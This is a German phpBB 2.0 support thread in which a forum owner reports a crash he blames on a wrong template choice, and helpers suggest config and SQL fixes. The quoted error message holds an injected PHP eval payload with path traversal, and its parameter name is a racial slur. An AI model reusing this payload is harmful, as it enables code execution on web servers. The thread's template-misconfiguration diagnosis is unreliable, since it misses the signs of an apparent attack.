Crash nach falscher Templateauswahl

Alles zu Styles, Templates, Icons und Smilies für phpBB 2.0, sowie allgemeine Designfragen zur Integration von phpBB in bestehende Websites.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.0, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Detlef
Mitglied

Crash nach falscher Templateauswahl

Beitrag von Detlef »

Hallo Experten,
seit ich bei der Farbgestaltung der Foren statt Silver F1-Black versehentlich angeklickt habe, kann ich die Foren nicht mehr aufrufen.
Ich bekomme dann folgende Fehlermeldung.

-------------------------------------------------------------------
phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 288
File : /is/htdocs/17715/www.anti-jagd-seite.de/forum/includes/functions.php

------------------------------------------------------------

Nun habe ich schon fast alle Dateien der Foren ersetzt und dennoch funktioniert nichts. Ins Admin komme ich so natürlich auch nicht rein. Die Datei "forum/includes/functions.php" habe ich ebenfalls ersetzt. Ich weiß nicht, wo sich die falsche Farbeinstellung abgespeichert hat Wer kann mir da Tipps geben. Die Foren müssen unbedingt wieder Online.
Zuletzt geändert von Detlef am 31.03.2005 18:32, insgesamt 1-mal geändert.
Jan500
Ehemaliges Teammitglied
Beitrag von Jan500 »

hi

ist im F1-Black template ordner eine .cfg datei, die genau so heißt wie der ordner?

wenn nein kopier die in den ordner und musst auch auf groß klein schreibung achten :wink:

Jan
Detlef
Mitglied

Beitrag von Detlef »

Mit F1 Black im Adminbereich kann man wohl eine neue Farbauswahl für die Foren bestimmen und speichern. So hat man verschiedene Farbmöglichkeiten der Foren zur Auswahl. Nur war da noch nichts festgelegt. Und deshalb kann auch nichts angezeigt werden.

Ich habe auch schon fast alle gesicherten Dateien neu hochgeladen und dennoch funktioniert nichts. Die falsche Admineinstellung muss sich aber irgend wo abgespeichert haben.
Jan500
Ehemaliges Teammitglied
Beitrag von Jan500 »

Detlef
Mitglied

Beitrag von Detlef »

Ja Danke, ich habe dort den Fall auch mal gepostet. Kam bislang aber noch nichts.
Detlef
Mitglied

Beitrag von Detlef »

Das Template was jetzt aufgerufen wird, exustiert doch noch gar nicht. So kann esnatürlich nicht funktionieren. Nur von welcher Datei kommt dieser Befehl? Ich habe doch schon fast alle Dateien neu ersetzt.
Jan500
Ehemaliges Teammitglied
Beitrag von Jan500 »

dann probier mal einen ordner mit diesem namen anzulegen im templates ordner und dann die subsilver.cfg in diesen ordner zu kopieren und diese dann umbenennen nach dem falschen template...

noch ne frage: wenn du es auswählen konntest im acp dann musste/ist es ja einmal installier sein oder?

edit:
probier doch mal das runterzuladen und dann aufm server uploaden...
http://www.phpbbhacks.com/download.php?id=736

Jan
Detlef
Mitglied

Beitrag von Detlef »

edit:
probier doch mal das runterzuladen und dann aufm server uploaden...
http://www.phpbbhacks.com/download.php?id=736

Da war ein sehr hoffnungsvoller Versuch. Habe auch das ganze Verzeichnis, nebst allen Dateien hochgeladen, nur funktioniert trotzdem nichts. Im Ausgang von Fi Black befand sich auch nichts. Ob das das Problem ist? In dieser Einstellung war ja noch gar nichts eingetragen. Vorher liefen die Foren schon Monate. Aber immer nur mit dem Silver-Template. Wo nur ruft er nur dieses Fi Black-Template auf?
Detlef
Mitglied

Beitrag von Detlef »

Danke für die Anrwort. Ein befreundeter Programmierer von mir richtet mir die Foren und installiert auch gleich eine neuere Version der Foren. Ich hatte ja noch das alte 2.0.
Jan500
Ehemaliges Teammitglied
Beitrag von Jan500 »

vielleicht hilft dir das auch noch was...
Knowledge Base hat geschrieben:Wird nun aus irgendeinem Grund das Template entfernt, kann phpBB nicht mehr auf das Template mit dieser ID zugreifen und zeigt diese Fehlermeldung.
Als erstes müssen wir eine funktionierende ID eines Templates wissen. Ist subSilver standardmäßig installiert, hat dieses meistens die ID 1. Wer sich nicht sicher ist, welche themes_id funktioniert, öffnet mit phpMyAdmin die Tabelle phpbb_themes seiner Datenbank.
Dort findet man den Namen und die themes_id des installierten Templates. Diese ID brauchen wir nun für Schritt 2.

Wir öffnen die Tabelle mit den Konfigurationseinstellungen für phpBB, phpbb_config.
Dort finden wir das Feld default_style (möglicherweise auch erst auf der zweiten Seite) und tragen dort die eben zuvor ausgewählte themes_id ein.
Sollte im Adminbereich "Style überschreiben" auf 'Ja' stehen, können wir hier nun aufhören, da die User das Template nutzen, das im Adminbereich eingestellt ist, bzw. was wir gerade über phpMyAdmin eingestellt haben.
Ist dort 'Nein' gewählt, besteht die Möglichkeit, dass ein User das nicht funktionierende Template ausgewählt hat und auch eine Fehlermeldung erhält.
Hierzu gibt es zwei Möglichkeiten, den user_style in der Tabelle phpbb_users zu ändern.
1. Für jeden User, der diesen Style benutzt einzeln oder
2. Mit einer kleinen Abfrage im SQL-Feld von phpMyAdmin.
Für Nr. 2 brauchen wir wieder die neue, funktionierende ID (ID1) und diesmal auch die alte, nicht funktionierende ID (ID2) Die nicht funktionierende erkennt man anhand der Fehlermeldung (s.o.).
Nun gehen wir ins SQL-Feld von phpMyAdmin und geben einZitat:
UPDATE phpbb_users SET user_style = 'ID1' WHERE user_style = 'ID2';
So werden alle IDs geändert, die die alte, nicht funktionierende ID benutzt haben.

Für Nr. 1 machen wir quasi das selbe, nur für jeden User einzeln.
Wir öffnen die Tabelle phpbb_users und ändern bei den Users, die die alte, nicht funktionierende ID benutzen den Wert user_style auf die neue, funktionierende ID.
Jan
Antworten

Zurück zu „phpBB 2.0: Styles, Templates und Grafiken“